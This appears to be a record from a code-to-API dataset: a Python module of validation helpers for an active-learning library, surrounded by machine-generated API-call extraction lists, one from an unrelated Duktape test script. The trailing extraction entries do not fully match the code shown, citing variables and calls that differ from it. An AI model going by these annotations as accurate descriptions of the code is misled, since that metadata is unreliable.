[((620, 770), 'os.system', 'os.system', (["('cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt'\n % (duktape_repo, merge_count))"], {}), "(\n 'cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt'\n % (duktape_repo, merge_count))\n", (629, 770), False, 'import os\n'), ((1095, 1130), 're.compile', 're.compile', (['"""^v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""'], {}), "('^v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$')\n", (1105, 1130), False, 'import re\n'), ((1856, 2103), 'os.system', 'os.system', (["('cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json'\n % (duktape_testrunner_repo, duktape_testclient_config))"], {}), "(\n 'cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json'\n % (duktape_testrunner_repo, duktape_testclient_config))\n", (1865, 2103), False, 'import os\n'), ((3138, 3193), 'os.system', 'os.system', (["('%s %s /tmp/tmp-script.js' % (duk, lzstring))"], {}), "('%s %s /tmp/tmp-script.js' % (duk, lzstring))\n", (3147, 3193), False, 'import os\n'), ((1189, 1283), 'os.system', 'os.system', (["('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (duktape_repo, h)\n )"], {}), "('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (\n duktape_repo, h))\n", (1198, 1283), False, 'import os\n'), ((1571, 1604), 'json.dumps', 'json.dumps', (['annotations'], {'indent': '(4)'}), '(annotations, indent=4)\n', (1581, 1604), False, 'import json\n'), ((1834, 1849), 'json.dumps', 'json.dumps', (['req'], {}), '(req)\n', (1844, 1849), False, 'import json\n'), ((2695, 2710), 'json.dumps', 'json.dumps', (['doc'], {}), '(doc)\n', (2705, 2710), False, 'import json\n')]
|
import copy
import warnings
from collections.abc import Iterable
from inspect import Parameter, signature
import numpy as np
from sklearn.utils.validation import (
check_array,
column_or_1d,
assert_all_finite,
check_consistent_length,
check_random_state as check_random_state_sklearn,
)
from ._label import MISSING_LABEL, check_missing_label, is_unlabeled
def check_scalar(
    x,
    name,
    target_type,
    min_inclusive=True,
    max_inclusive=True,
    min_val=None,
    max_val=None,
):
    """Validate that a scalar parameter has the expected type and value range.

    Parameters
    ----------
    x : object
        The scalar parameter to validate.
    name : str
        The name of the parameter to be printed in error messages.
    target_type : type or tuple
        Acceptable data types for the parameter.
    min_inclusive : bool, optional (default=True)
        If true, the minimum valid value is inclusive, otherwise exclusive.
    max_inclusive : bool, optional (default=True)
        If true, the maximum valid value is inclusive, otherwise exclusive.
    min_val : float or int, optional (default=None)
        The minimum valid value the parameter can take. If None (default) it
        is implied that the parameter does not have a lower bound.
    max_val : float or int, optional (default=None)
        The maximum valid value the parameter can take. If None (default) it
        is implied that the parameter does not have an upper bound.

    Raises
    ------
    TypeError
        If the parameter's type does not match the desired type.
    ValueError
        If the parameter's value violates the given bounds.
    """
    if not isinstance(x, target_type):
        raise TypeError(
            "`{}` must be an instance of {}, not {}.".format(
                name, target_type, type(x)
            )
        )
    # Lower bound: the comparison and the operator shown in the message
    # depend on whether the bound is inclusive.
    if min_val is not None:
        violates_min = x < min_val if min_inclusive else x <= min_val
        if violates_min:
            op = ">=" if min_inclusive else ">"
            raise ValueError(
                "`{}`= {}, must be {} {}.".format(name, x, op, min_val)
            )
    # Upper bound, analogous to the lower bound above.
    if max_val is not None:
        violates_max = x > max_val if max_inclusive else x >= max_val
        if violates_max:
            op = "<=" if max_inclusive else "<"
            raise ValueError(
                "`{}`= {}, must be {} {}.".format(name, x, op, max_val)
            )
def check_classifier_params(classes, missing_label, cost_matrix=None):
    """Check that classifier parameters are mutually compatible (only if
    `classes` is not None).

    Parameters
    ----------
    classes : array-like, shape (n_classes)
        Array of class labels.
    missing_label : {number, str, None, np.nan}
        Symbol to represent a missing label.
    cost_matrix : array-like, shape (n_classes, n_classes), default=None
        Cost matrix. If None, cost matrix will be not checked.
    """
    check_missing_label(missing_label)
    if classes is None:
        # A cost matrix cannot be validated without knowing the classes.
        if cost_matrix is not None:
            raise ValueError(
                "You cannot specify 'cost_matrix' without "
                "specifying 'classes'."
            )
        return
    check_classes(classes)
    dtype = np.array(classes).dtype
    check_missing_label(missing_label, target_type=dtype, name="classes")
    # The class list itself must not contain the missing-label symbol.
    if is_unlabeled(y=classes, missing_label=missing_label).sum() > 0:
        raise ValueError(
            f"`classes={classes}` contains "
            f"`missing_label={missing_label}.`"
        )
    if cost_matrix is not None:
        check_cost_matrix(cost_matrix=cost_matrix, n_classes=len(classes))
def check_classes(classes):
    """Check that class labels are uniformly strings or uniformly numbers.

    Parameters
    ----------
    classes : array-like, shape (n_classes)
        Array of class labels.
    """
    if not isinstance(classes, Iterable):
        raise TypeError(
            "'classes' is not iterable. Got {}".format(type(classes))
        )
    try:
        # Sorting a mixture of strings and numbers raises a TypeError,
        # which is translated into a descriptive message below.
        distinct = np.array(sorted(set(classes)))
        if len(distinct) != len(classes):
            raise ValueError("Duplicate entries in 'classes'.")
    except TypeError:
        types = sorted(t.__qualname__ for t in set(type(v) for v in classes))
        raise TypeError(
            "'classes' must be uniformly strings or numbers. Got {}".format(
                types
            )
        )
def check_class_prior(class_prior, n_classes):
    """Check if the class_prior is a valid prior.

    Parameters
    ----------
    class_prior : numeric | array_like, shape (n_classes)
        A class prior.
    n_classes : int
        The number of classes.

    Returns
    -------
    class_prior : np.ndarray, shape (n_classes)
        Numpy array as prior.

    Raises
    ------
    TypeError
        If `class_prior` is None or `n_classes` is not an int.
    ValueError
        If `class_prior` is negative or has the wrong shape.
    """
    if class_prior is None:
        raise TypeError("'class_prior' must not be None.")
    check_scalar(n_classes, name="n_classes", target_type=int, min_val=1)
    if np.isscalar(class_prior):
        check_scalar(
            class_prior,
            name="class_prior",
            target_type=(int, float),
            min_val=0,
        )
        # Broadcast the scalar prior to every class.
        class_prior = np.array([class_prior] * n_classes)
    else:
        class_prior = check_array(class_prior, ensure_2d=False)
        # BUGFIX: the original message rendered as "non-negativefloat"
        # because a space was missing between adjacent string literals.
        if class_prior.shape != (n_classes,) or np.any(class_prior < 0):
            raise ValueError(
                "`class_prior` must be either a non-negative "
                "float or a list of `n_classes` non-negative "
                "floats."
            )
    return class_prior.reshape(-1)
def check_cost_matrix(
    cost_matrix,
    n_classes,
    only_non_negative=False,
    contains_non_zero=False,
    diagonal_is_zero=False,
):
    """Check whether cost matrix has shape `(n_classes, n_classes)`.

    Parameters
    ----------
    cost_matrix : array-like, shape (n_classes, n_classes)
        Cost matrix.
    n_classes : int
        Number of classes.
    only_non_negative : bool, optional (default=False)
        This parameter determines whether the matrix must contain only non
        negative cost entries.
    contains_non_zero : bool, optional (default=False)
        This parameter determines whether the matrix must contain at least
        one non-zero cost entry.
    diagonal_is_zero : bool, optional (default=False)
        This parameter determines whether the diagonal cost entries must be
        zero.

    Returns
    -------
    cost_matrix_new : np.ndarray, shape (n_classes, n_classes)
        Numpy array as cost matrix.
    """
    # NOTE: the docstring previously claimed `default=True` for the three
    # flags although their actual defaults are `False`; fixed above.
    check_scalar(n_classes, target_type=int, name="n_classes", min_val=1)
    cost_matrix_new = check_array(
        np.array(cost_matrix, dtype=float), ensure_2d=True
    )
    if cost_matrix_new.shape != (n_classes, n_classes):
        raise ValueError(
            "'cost_matrix' must have shape ({}, {}). "
            "Got {}.".format(n_classes, n_classes, cost_matrix_new.shape)
        )
    # Negative entries: either forbidden (raise) or merely suspicious (warn).
    if np.sum(cost_matrix_new < 0) > 0:
        if only_non_negative:
            raise ValueError(
                "'cost_matrix' must contain only non-negative cost entries."
            )
        else:
            warnings.warn("'cost_matrix' contains negative cost entries.")
    # An all-zero matrix carries no cost information (for n_classes > 1).
    if n_classes != 1 and np.sum(cost_matrix_new != 0) == 0:
        if contains_non_zero:
            raise ValueError(
                "'cost_matrix' must contain at least one non-zero cost "
                "entry."
            )
        else:
            # BUGFIX: removed the duplicated word "contains contains".
            warnings.warn(
                "'cost_matrix' contains no non-zero cost entry."
            )
    # Non-zero diagonal means predicting the true class still costs something.
    if np.sum(np.diag(cost_matrix_new) != 0) > 0:
        if diagonal_is_zero:
            raise ValueError(
                "'cost_matrix' must contain only cost entries being zero on "
                "its diagonal."
            )
        else:
            warnings.warn(
                "'cost_matrix' contains non-zero cost entries on its diagonal."
            )
    return cost_matrix_new
def check_X_y(
    X=None,
    y=None,
    X_cand=None,
    sample_weight=None,
    sample_weight_cand=None,
    accept_sparse=False,
    *,
    accept_large_sparse=True,
    dtype="numeric",
    order=None,
    copy=False,
    force_all_finite=True,
    ensure_2d=True,
    allow_nd=False,
    multi_output=False,
    allow_nan=None,
    ensure_min_samples=1,
    ensure_min_features=1,
    y_numeric=False,
    estimator=None,
    missing_label=MISSING_LABEL,
):
    """Input validation for standard estimators.
    Checks X and y for consistent length, enforces X to be 2D and y 1D. By
    default, X is checked to be non-empty and containing only finite values.
    Standard input checks are also applied to y, such as checking that y
    does not have np.nan or np.inf targets. For multi-label y, set
    multi_output=True to allow 2D and sparse y. If the dtype of X is
    object, attempt converting to float, raising on failure.
    Parameters
    ----------
    X : nd-array, list or sparse matrix
        Labeled input data.
    y : nd-array, list or sparse matrix
        Labels for X.
    X_cand : nd-array, list or sparse matrix (default=None)
        Unlabeled input data
    sample_weight : array-like of shape (n_samples,) (default=None)
        Sample weights.
    sample_weight_cand : array-like of shape (n_candidates,) (default=None)
        Sample weights of the candidates.
    accept_sparse : string, boolean or list of string (default=False)
        String[s] representing allowed sparse matrix formats, such as 'csc',
        'csr', etc. If the input is sparse but not in the allowed format,
        it will be converted to the first listed format. True allows the input
        to be any format. False means that a sparse matrix input will
        raise an error.
    accept_large_sparse : bool (default=True)
        If a CSR, CSC, COO or BSR sparse matrix is supplied and accepted by
        accept_sparse, accept_large_sparse will cause it to be accepted only
        if its indices are stored with a 32-bit dtype.
        .. versionadded:: 0.20
    dtype : string, type, list of types or None (default="numeric")
        Data type of result. If None, the dtype of the input is preserved.
        If "numeric", dtype is preserved unless array.dtype is object.
        If dtype is a list of types, conversion on the first type is only
        performed if the dtype of the input is not in the list.
    order : 'F', 'C' or None (default=None)
        Whether an array will be forced to be fortran or c-style.
    copy : boolean (default=False)
        Whether a forced copy will be triggered. If copy=False, a copy might
        be triggered by a conversion.
    force_all_finite : boolean or 'allow-nan', (default=True)
        Whether to raise an error on np.inf, np.nan, pd.NA in X. This parameter
        does not influence whether y can have np.inf, np.nan, pd.NA values.
        The possibilities are:
        - True: Force all values of X to be finite.
        - False: accepts np.inf, np.nan, pd.NA in X.
        - 'allow-nan': accepts only np.nan or pd.NA values in X. Values cannot
          be infinite.
        .. versionadded:: 0.20
           ``force_all_finite`` accepts the string ``'allow-nan'``.
        .. versionchanged:: 0.23
           Accepts `pd.NA` and converts it into `np.nan`
    ensure_2d : boolean (default=True)
        Whether to raise a value error if X is not 2D.
    allow_nd : boolean (default=False)
        Whether to allow X.ndim > 2.
    multi_output : boolean (default=False)
        Whether to allow 2D y (array or sparse matrix). If false, y will be
        validated as a vector. y cannot have np.nan or np.inf values if
        multi_output=True.
    allow_nan : boolean (default=None)
        Whether to allow np.nan in y.
    ensure_min_samples : int (default=1)
        Make sure that X has a minimum number of samples in its first
        axis (rows for a 2D array).
    ensure_min_features : int (default=1)
        Make sure that the 2D array has some minimum number of features
        (columns). The default value of 1 rejects empty datasets.
        This check is only enforced when X has effectively 2 dimensions or
        is originally 1D and ``ensure_2d`` is True. Setting to 0 disables
        this check.
    y_numeric : boolean (default=False)
        Whether to ensure that y has a numeric type. If dtype of y is object,
        it is converted to float64. Should only be used for regression
        algorithms.
    estimator : str or estimator instance (default=None)
        If passed, include the name of the estimator in warning messages.
    missing_label : {scalar, string, np.nan, None}, (default=np.nan)
        Value to represent a missing label.
    Returns
    -------
    X_converted : object
        The converted and validated X.
    y_converted : object
        The converted and validated y.
    candidates : object
        The converted and validated candidates
        Only returned if candidates is not None.
    sample_weight : np.ndarray
        The converted and validated sample_weight.
    sample_weight_cand : np.ndarray
        The converted and validated sample_weight_cand.
        Only returned if candidates is not None.
    """
    # By default, NaN labels are permitted exactly when the missing-label
    # symbol itself is np.nan.
    if allow_nan is None:
        allow_nan = True if missing_label is np.nan else False
    if X is not None:
        X = check_array(
            X,
            accept_sparse=accept_sparse,
            accept_large_sparse=accept_large_sparse,
            dtype=dtype,
            order=order,
            copy=copy,
            force_all_finite=force_all_finite,
            ensure_2d=ensure_2d,
            allow_nd=allow_nd,
            ensure_min_samples=ensure_min_samples,
            ensure_min_features=ensure_min_features,
            estimator=estimator,
        )
    if y is not None:
        if multi_output:
            y = check_array(
                y,
                accept_sparse="csr",
                force_all_finite=True,
                ensure_2d=False,
                dtype=None,
            )
        else:
            y = column_or_1d(y, warn=True)
            assert_all_finite(y, allow_nan=allow_nan)
        if y_numeric and y.dtype.kind == "O":
            y = y.astype(np.float64)
    if X is not None and y is not None:
        check_consistent_length(X, y)
        # Default to uniform sample weights matching y's shape.
        if sample_weight is None:
            sample_weight = np.ones(y.shape)
        sample_weight = check_array(sample_weight, ensure_2d=False)
        check_consistent_length(y, sample_weight)
        if (
            y.ndim > 1
            and y.shape[1] > 1
            or sample_weight.ndim > 1
            and sample_weight.shape[1] > 1
        ):
            check_consistent_length(y.T, sample_weight.T)
    if X_cand is not None:
        X_cand = check_array(
            X_cand,
            accept_sparse=accept_sparse,
            accept_large_sparse=accept_large_sparse,
            dtype=dtype,
            order=order,
            copy=copy,
            force_all_finite=force_all_finite,
            ensure_2d=ensure_2d,
            allow_nd=allow_nd,
            ensure_min_samples=ensure_min_samples,
            ensure_min_features=ensure_min_features,
            estimator=estimator,
        )
        if X is not None and X_cand.shape[1] != X.shape[1]:
            # BUGFIX: the original message rendered as "...does not matchthe
            # number..." because a space was missing between the literals.
            raise ValueError(
                "The number of features of candidates does not match "
                "the number of features of X"
            )
        if sample_weight_cand is None:
            sample_weight_cand = np.ones(len(X_cand))
        sample_weight_cand = check_array(sample_weight_cand, ensure_2d=False)
        check_consistent_length(X_cand, sample_weight_cand)
    if X_cand is None:
        return X, y, sample_weight
    else:
        return X, y, X_cand, sample_weight, sample_weight_cand
def check_random_state(random_state, seed_multiplier=None):
    """Validate the given random state and optionally derive a new one.

    Parameters
    ----------
    random_state : None | int | instance of RandomState
        If random_state is None, return the RandomState singleton used by
        np.random.
        If random_state is an int, return a new RandomState.
        If random_state is already a RandomState instance, return it.
        Otherwise raise ValueError.
    seed_multiplier : None | int, optional (default=None)
        If the random_state and seed_multiplier are not None, draw a new int
        from the random state, multiply it with the multiplier, and use the
        product as the seed of a new random state.

    Returns
    -------
    random_state: instance of RandomState
        The validated random state.
    """
    if random_state is None or seed_multiplier is None:
        return check_random_state_sklearn(random_state)
    check_scalar(
        seed_multiplier, name="seed_multiplier", target_type=int, min_val=1
    )
    # Deep-copy first so that drawing the seed does not advance the state
    # of the caller's random number generator.
    base_state = check_random_state_sklearn(copy.deepcopy(random_state))
    derived_seed = (base_state.randint(1, 2**31) * seed_multiplier) % (2**31)
    return np.random.RandomState(derived_seed)
def check_indices(indices, A, dim="adaptive", unique=True):
    """Check if indices fit to array.

    Parameters
    ----------
    indices : array-like of shape (n_indices, n_dim) or (n_indices,)
        The considered indices, where for every `i = 0, ..., n_indices - 1`
        `indices[i]` is interpreted as an index to the array `A`.
    A : array-like
        The array that is indexed.
    dim : int or tuple of ints
        The dimensions of the array that are indexed.
        If `dim` equals `'adaptive'`, `dim` is set to first indices
        corresponding to the shape of `indices`. E.g., if `indices` is of
        shape (n_indices,), `dim` is set `0`.
    unique: bool or `check_unique`
        If `unique` is `True` unique indices are returned. If `unique` is
        `'check_unique'` an exception is raised if the indices are not unique.

    Returns
    -------
    indices: tuple of np.ndarrays or np.ndarray
        The validated indices.

    Raises
    ------
    ValueError
        If the indices are out of range, have the wrong shape, or are
        required to be unique but are not.
    """
    indices = check_array(indices, dtype=int, ensure_2d=False)
    A = check_array(A, allow_nd=True, force_all_finite=False, ensure_2d=False)
    if unique == "check_unique":
        # Only verify uniqueness; do not deduplicate.
        if indices.ndim == 1:
            n_unique_indices = len(np.unique(indices))
        else:
            n_unique_indices = len(np.unique(indices, axis=0))
        if n_unique_indices < len(indices):
            raise ValueError(
                f"`indices` contains two different indices of the "
                f"same value."
            )
    elif unique:
        if indices.ndim == 1:
            indices = np.unique(indices)
        else:
            indices = np.unique(indices, axis=0)
    check_type(dim, "dim", int, tuple, target_vals=["adaptive"])
    if dim == "adaptive":
        # Infer the indexed dimensions from the shape of `indices`.
        if indices.ndim == 1:
            dim = 0
        else:
            dim = tuple(range(indices.shape[1]))
    if isinstance(dim, tuple):
        for n in dim:
            check_type(n, "entry of `dim`", int)
        if A.ndim <= max(dim):
            raise ValueError(
                f"`dim` contains entry of value {max(dim)}, but all"
                f"entries of dim must be smaller than {A.ndim}."
            )
        if len(dim) != indices.shape[1]:
            # BUGFIX: the message previously reported `indices.shape[0]`
            # although the check compares `indices.shape[1]` against
            # `len(dim)`.
            raise ValueError(
                f"shape of `indices` along dimension 1 is "
                f"{indices.shape[1]}, but must be {len(dim)}"
            )
        indices = tuple(indices.T)
        for i, idx in enumerate(indices):
            if np.any(idx >= A.shape[dim[i]]):
                raise ValueError(
                    f"`indices[{i}]` contains index of value "
                    f"{np.max(idx)} but all indices must be"
                    f" less than {A.shape[dim[i]]}."
                )
        return indices
    else:
        if A.ndim <= dim:
            raise ValueError(
                f"`dim` has value {dim}, but must be smaller than "
                f"{A.ndim}."
            )
        if np.any(indices >= A.shape[dim]):
            raise ValueError(
                f"`indices` contains index of value "
                f"{np.max(indices)} but all indices must be"
                f" less than {A.shape[dim]}."
            )
        return indices
def check_type(
    obj, name, *target_types, target_vals=None, indicator_funcs=None
):
    """Check that obj has one of the given types, equals one of the allowed
    values, or is accepted by one of the indicator functions.

    Parameters
    ----------
    obj: object
        The object to be checked.
    name: str
        The variable name of the object.
    target_types : iterable
        The possible types.
    target_vals : iterable, optional (default=None)
        Possible further values that the object is allowed to equal.
    indicator_funcs : iterable, optional (default=None)
        Possible further custom indicator (boolean) functions that accept
        the object by returning `True` if the object is passed as a parameter.
    """
    if target_vals is None:
        target_vals = []
    if indicator_funcs is None:
        indicator_funcs = []
    # Acceptance criteria: correct type, allowed value, or any indicator
    # function returning True. All three are evaluated eagerly, as before.
    type_ok = isinstance(obj, target_types)
    value_ok = obj in target_vals
    func_ok = any(i_func(obj) for i_func in indicator_funcs)
    if type_ok or value_ok or func_ok:
        return
    n_types = len(target_types)
    n_vals = len(target_vals)
    n_funcs = len(indicator_funcs)
    msg = f"`{name}` "
    if n_types == 0 and n_vals == 0:
        msg += " must"
    if n_vals == 0 and n_types > 0:
        msg += f" has type `{type(obj)}`, but must"
    elif n_vals > 0 and n_types == 0:
        msg += f" has value `{obj}`, but must"
    else:
        msg += f" has type `{type(obj)}` and value `{obj}`, but must"
    if n_types == 1:
        msg += f" have type `{target_types[0]}`"
    elif 1 <= n_types <= 3:
        msg += " have type"
        msg += "".join(f" `{t}`," for t in target_types[:-1])
        msg += f" or `{target_types[-1]}`"
    elif n_types > 3:
        msg += f" have one of the following types: {set(target_types)}"
    if n_vals > 0:
        if n_types > 0 and n_funcs == 0:
            msg += " or"
        elif n_types > 0 and n_funcs > 0:
            msg += ","
        msg += f" equal one of the following values: {set(target_vals)}"
    if n_funcs > 0:
        if n_types > 0 or n_vals > 0:
            msg += " or"
        msg += (
            f" be accepted by one of the following custom boolean "
            f"functions: {set(i_f.__name__ for i_f in indicator_funcs)}"
        )
    raise TypeError(msg + ".")
def check_callable(func, name, n_free_parameters=None):
    """Check that `func` is callable and has the expected number of free
    parameters.

    Parameters
    ----------
    func: callable
        The functions to be validated.
    name: str
        The name of the function
    n_free_parameters: int, optional (default=None)
        The number of free parameters. If `n_free_parameters` is `None`,
        `n_free_parameters` is set to `1`.
    """
    if n_free_parameters is None:
        n_free_parameters = 1
    if not callable(func):
        raise TypeError(
            f"`{name}` must be callable. " f"`{name}` is of type {type(func)}"
        )
    # A parameter is "free" when it has no default value.
    n_free_params = sum(
        p.default == Parameter.empty
        for p in signature(func).parameters.values()
    )
    if n_free_params != n_free_parameters:
        raise ValueError(
            f"The number of free parameters of the callable has to "
            f"equal {n_free_parameters}. "
            f"The number of free parameters is {n_free_params}."
        )
def check_bound(
    bound=None, X=None, ndim=2, epsilon=0, bound_must_be_given=False
):
    """Validate `bound`, inferring it from `X` when it is not given.
    `bound` or `X` must not be None.

    Parameters
    ----------
    bound: array-like, shape (2, ndim), optional (default=None)
        The given bound of shape
        [[x1_min, x2_min, ..., xndim_min], [x1_max, x2_max, ..., xndim_max]]
    X: matrix-like, shape (n_samples, ndim), optional (default=None)
        The sample matrix X is the feature matrix representing samples.
    ndim: int, optional (default=2)
        The number of dimensions.
    epsilon: float, optional (default=0)
        The minimal distance between the returned bound and the values of `X`,
        if `bound` is not specified.
    bound_must_be_given: bool, optional (default=False)
        Whether it is allowed for the bound to be `None` and to be inferred by
        `X`.

    Returns
    -------
    bound: array-like, shape (2, ndim), optional (default=None)
        The given bound or bound of X.
    """
    if X is not None:
        X = check_array(X)
        if X.shape[1] != ndim:
            raise ValueError(
                f"`X` along axis 1 must be of length {ndim}. "
                f"`X` along axis 1 is of length {X.shape[1]}."
            )
    if bound is None:
        if bound_must_be_given:
            raise ValueError("`bound` must not be `None`.")
        if X is None:
            raise ValueError("`X` or `bound` must not be None.")
        # Infer the bound from the data, padded by epsilon on both sides.
        lower = (np.nanmin(X, axis=0) - epsilon).reshape(1, -1)
        upper = (np.nanmax(X, axis=0) + epsilon).reshape(1, -1)
        return np.append(lower, upper, axis=0)
    bound = check_array(bound)
    if bound.shape != (2, ndim):
        raise ValueError(
            f"Shape of `bound` must be (2, {ndim}). "
            f"Shape of `bound` is {bound.shape}."
        )
    # When both are given, warn about samples outside the bound.
    if X is not None and np.any(np.logical_or(bound[0] > X, X > bound[1])):
        warnings.warn("`X` contains values not within range of `bound`.")
    return bound
def check_budget_manager(
    budget,
    budget_manager,
    default_budget_manager_class,
    default_budget_manager_dict=None,
):
    """Validate the budget manager and return an independent copy
    `budget_manager_`; build a default manager when none is given.
    """
    if default_budget_manager_dict is None:
        default_budget_manager_dict = {}
    if budget_manager is not None:
        # A separately supplied budget is ignored; warn when it disagrees
        # with the budget already configured on the manager.
        if budget is not None and budget != budget_manager.budget:
            warnings.warn(
                "budgetmanager is already given such that the budget "
                "is not used. The given budget differs from the "
                "budget_managers budget."
            )
        return copy.deepcopy(budget_manager)
    return default_budget_manager_class(
        budget=budget, **default_budget_manager_dict
    )
|
[
"numpy.sum",
"numpy.ones",
"sklearn.utils.validation.check_consistent_length",
"numpy.diag",
"numpy.unique",
"numpy.random.RandomState",
"numpy.max",
"inspect.signature",
"sklearn.utils.validation.check_array",
"copy.deepcopy",
"sklearn.utils.validation.column_or_1d",
"numpy.nanmax",
"numpy.isscalar",
"numpy.nanmin",
"numpy.any",
"sklearn.utils.validation.check_random_state",
"numpy.array",
"numpy.logical_or",
"sklearn.utils.validation.assert_all_finite",
"warnings.warn"
] |
[((5175, 5199), 'numpy.isscalar', 'np.isscalar', (['class_prior'], {}), '(class_prior)\n', (5186, 5199), True, 'import numpy as np\n'), ((17167, 17194), 'copy.deepcopy', 'copy.deepcopy', (['random_state'], {}), '(random_state)\n', (17180, 17194), False, 'import copy\n'), ((17214, 17254), 'sklearn.utils.validation.check_random_state', 'check_random_state_sklearn', (['random_state'], {}), '(random_state)\n', (17240, 17254), True, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((17339, 17366), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (17360, 17366), True, 'import numpy as np\n'), ((18350, 18398), 'sklearn.utils.validation.check_array', 'check_array', (['indices'], {'dtype': 'int', 'ensure_2d': '(False)'}), '(indices, dtype=int, ensure_2d=False)\n', (18361, 18398), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((18407, 18477), 'sklearn.utils.validation.check_array', 'check_array', (['A'], {'allow_nd': '(True)', 'force_all_finite': '(False)', 'ensure_2d': '(False)'}), '(A, allow_nd=True, force_all_finite=False, ensure_2d=False)\n', (18418, 18477), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((5373, 5408), 'numpy.array', 'np.array', (['([class_prior] * n_classes)'], {}), '([class_prior] * n_classes)\n', (5381, 5408), True, 'import numpy as np\n'), ((5441, 5482), 'sklearn.utils.validation.check_array', 'check_array', (['class_prior'], {'ensure_2d': '(False)'}), '(class_prior, ensure_2d=False)\n', (5452, 5482), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as 
check_random_state_sklearn\n'), ((5505, 5528), 'numpy.sum', 'np.sum', (['(class_prior < 0)'], {}), '(class_prior < 0)\n', (5511, 5528), True, 'import numpy as np\n'), ((6906, 6940), 'numpy.array', 'np.array', (['cost_matrix'], {'dtype': 'float'}), '(cost_matrix, dtype=float)\n', (6914, 6940), True, 'import numpy as np\n'), ((7191, 7218), 'numpy.sum', 'np.sum', (['(cost_matrix_new < 0)'], {}), '(cost_matrix_new < 0)\n', (7197, 7218), True, 'import numpy as np\n'), ((13632, 13948), 'sklearn.utils.validation.check_array', 'check_array', (['X'], {'accept_sparse': 'accept_sparse', 'accept_large_sparse': 'accept_large_sparse', 'dtype': 'dtype', 'order': 'order', 'copy': 'copy', 'force_all_finite': 'force_all_finite', 'ensure_2d': 'ensure_2d', 'allow_nd': 'allow_nd', 'ensure_min_samples': 'ensure_min_samples', 'ensure_min_features': 'ensure_min_features', 'estimator': 'estimator'}), '(X, accept_sparse=accept_sparse, accept_large_sparse=\n accept_large_sparse, dtype=dtype, order=order, copy=copy,\n force_all_finite=force_all_finite, ensure_2d=ensure_2d, allow_nd=\n allow_nd, ensure_min_samples=ensure_min_samples, ensure_min_features=\n ensure_min_features, estimator=estimator)\n', (13643, 13948), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14573, 14602), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['X', 'y'], {}), '(X, y)\n', (14596, 14602), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((14706, 14749), 'sklearn.utils.validation.check_array', 'check_array', (['sample_weight'], {'ensure_2d': '(False)'}), '(sample_weight, ensure_2d=False)\n', (14717, 14749), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state 
as check_random_state_sklearn\n'), ((14758, 14799), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['y', 'sample_weight'], {}), '(y, sample_weight)\n', (14781, 14799), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15062, 15383), 'sklearn.utils.validation.check_array', 'check_array', (['X_cand'], {'accept_sparse': 'accept_sparse', 'accept_large_sparse': 'accept_large_sparse', 'dtype': 'dtype', 'order': 'order', 'copy': 'copy', 'force_all_finite': 'force_all_finite', 'ensure_2d': 'ensure_2d', 'allow_nd': 'allow_nd', 'ensure_min_samples': 'ensure_min_samples', 'ensure_min_features': 'ensure_min_features', 'estimator': 'estimator'}), '(X_cand, accept_sparse=accept_sparse, accept_large_sparse=\n accept_large_sparse, dtype=dtype, order=order, copy=copy,\n force_all_finite=force_all_finite, ensure_2d=ensure_2d, allow_nd=\n allow_nd, ensure_min_samples=ensure_min_samples, ensure_min_features=\n ensure_min_features, estimator=estimator)\n', (15073, 15383), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15863, 15911), 'sklearn.utils.validation.check_array', 'check_array', (['sample_weight_cand'], {'ensure_2d': '(False)'}), '(sample_weight_cand, ensure_2d=False)\n', (15874, 15911), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), ((15920, 15971), 'sklearn.utils.validation.check_consistent_length', 'check_consistent_length', (['X_cand', 'sample_weight_cand'], {}), '(X_cand, sample_weight_cand)\n', (15943, 15971), False, 'from sklearn.utils.validation import check_array, column_or_1d, assert_all_finite, check_consistent_length, check_random_state as check_random_state_sklearn\n'), 
